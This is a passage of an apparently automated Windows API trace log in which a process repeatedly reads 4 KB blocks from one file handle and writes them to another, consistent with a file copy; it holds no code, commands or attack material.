1 [0092.131] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.131] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.131] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.132] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.132] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.132] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.132] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.132] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.132] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.133] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.133] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.133] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.133] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.156] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.156] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.156] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.156] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.156] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.156] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.156] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.156] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.157] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.157] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.157] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.157] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.157] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.157] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.158] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.158] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.158] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.159] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.159] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.159] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.159] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.160] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.160] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.160] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.160] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.160] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.160] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.161] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.161] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.161] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.161] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.161] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.161] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.161] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.162] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.162] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.162] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.162] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.162] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.162] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.162] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.163] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.163] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.163] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.163] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.163] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.163] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.163] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.164] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.164] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.164] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.164] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.164] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.164] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.164] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.165] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.165] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.165] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.165] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.165] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.165] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.165] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.166] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.166] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.166] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.166] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.166] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.166] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.166] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.166] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.167] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.167] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.167] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.167] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.167] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.167] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.167] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.168] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.168] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.168] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.168] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.169] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.169] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.169] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.169] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.169] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.169] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.169] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.170] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: 